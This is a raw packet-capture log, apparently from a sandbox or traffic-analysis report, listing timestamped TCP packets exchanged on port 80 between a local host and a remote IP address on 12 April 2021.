                                                                                                                                                                  Apr 12, 2021 17:12:29.538698912 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538703918 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538722038 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538728952 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538743019 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538768053 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538770914 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538790941 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538800955 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538814068 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538829088 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538836956 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538858891 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538858891 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538882971 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538883924 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538904905 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538907051 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538927078 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538934946 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538948059 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538954020 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538975954 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538976908 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538995028 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539000988 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539017916 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539024115 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539036036 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539045095 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539064884 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539068937 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539082050 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539091110 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539113045 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539113998 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539138079 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539138079 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539160967 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539161921 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539182901 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539184093 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539206028 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539212942 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539226055 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539230108 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539248943 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539253950 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539267063 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539278030 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.539290905 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.539315939 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.540817976 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.540848970 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.540870905 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.540894985 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.540896893 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.540918112 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.540932894 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.540941000 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.540977001 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.671871901 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.671895981 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.671909094 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.671945095 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.671973944 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672015905 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672028065 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672045946 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672059059 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672070980 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672082901 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672094107 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672116995 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672143936 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672178984 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672215939 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672230005 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672240973 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672256947 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672257900 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672276974 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672307014 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672308922 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672349930 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672396898 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672415018 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672439098 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672462940 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672487974 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672538996 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672589064 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672605991 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672621012 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672631025 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672638893 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672655106 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672667027 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672669888 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672686100 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672698021 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.672704935 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672722101 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.672724009 CEST4971480192.168.2.364.207.186.30
Timestamp                               Source Port  Dest Port  Source IP       Dest IP
Apr 12, 2021 17:12:29.672738075 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672746897 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672753096 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672769070 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672781944 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672785044 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672801018 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672813892 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672816038 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672837019 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672838926 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672854900 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672861099 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672869921 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672894001 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672920942 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672923088 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672940016 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672957897 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672966957 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.672972918 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.672988892 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673005104 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673007965 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673019886 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673027039 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673037052 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673052073 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673069000 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673070908 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673088074 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673098087 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673103094 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673119068 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673125982 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673134089 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673149109 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673154116 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673165083 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673177004 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673181057 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673199892 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673217058 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673217058 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673232079 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673249006 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673255920 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673264027 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673279047 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673286915 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673295021 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673310041 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673324108 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673329115 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673346043 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673361063 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673362970 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673396111 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673413038 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673425913 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673429966 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673443079 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673454046 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673475027 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673479080 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673496962 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.673510075 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.673540115 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.802740097 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.802771091 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.802784920 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.802803040 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.803478003 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.803822041 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.803853035 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.803868055 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.803884029 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.803903103 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.803960085 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.803972960 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.803991079 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804006100 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804016113 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804022074 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804038048 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804054022 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804054022 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804073095 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804090023 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804099083 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804105043 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804121017 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804131985 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804136992 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804152966 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804156065 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804167986 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804181099 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804183006 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804203033 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804219007 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804222107 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804234982 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804250956 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804264069 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804265976 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804281950 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804292917 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804297924 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804312944 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804320097 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804332018 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804348946 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804348946 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804364920 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804379940 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804389000 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804394960 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804409981 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804425955 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804426908 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804440975 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804450989 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804459095 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804476023 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804491043 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804500103 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804507017 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804522038 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804537058 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804552078 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804567099 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804578066 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804600000 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804609060 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804615021 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804630995 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804641962 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804650068 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804666042 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804682970 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804692984 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804721117 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804733992 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804745913 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804752111 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804768085 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804783106 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804786921 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804809093 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804816008 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804826975 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804843903 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804860115 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804862022 CEST    49714        80         192.168.2.3     64.207.186.30
Apr 12, 2021 17:12:29.804876089 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804893017 CEST    80           49714      64.207.186.30   192.168.2.3
Apr 12, 2021 17:12:29.804900885 CEST    49714        80         192.168.2.3     64.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.804909945 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.804927111 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.804928064 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.804944038 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.804955959 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.804963112 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.804980040 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.804995060 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805000067 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805011988 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805027008 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805028915 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805042982 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805054903 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805058956 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805073977 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805088043 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805093050 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805109978 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805120945 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805124998 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805140018 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805155993 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805157900 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805171013 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805186033 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805186987 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805202007 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805214882 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805221081 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805238008 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805248022 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805254936 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805270910 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805270910 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805288076 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805305004 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805321932 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805329084 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805337906 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805356979 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805373907 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805380106 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805411100 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805418015 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805435896 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805439949 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805454969 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805471897 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805474997 CEST4971480192.168.2.364.207.186.30
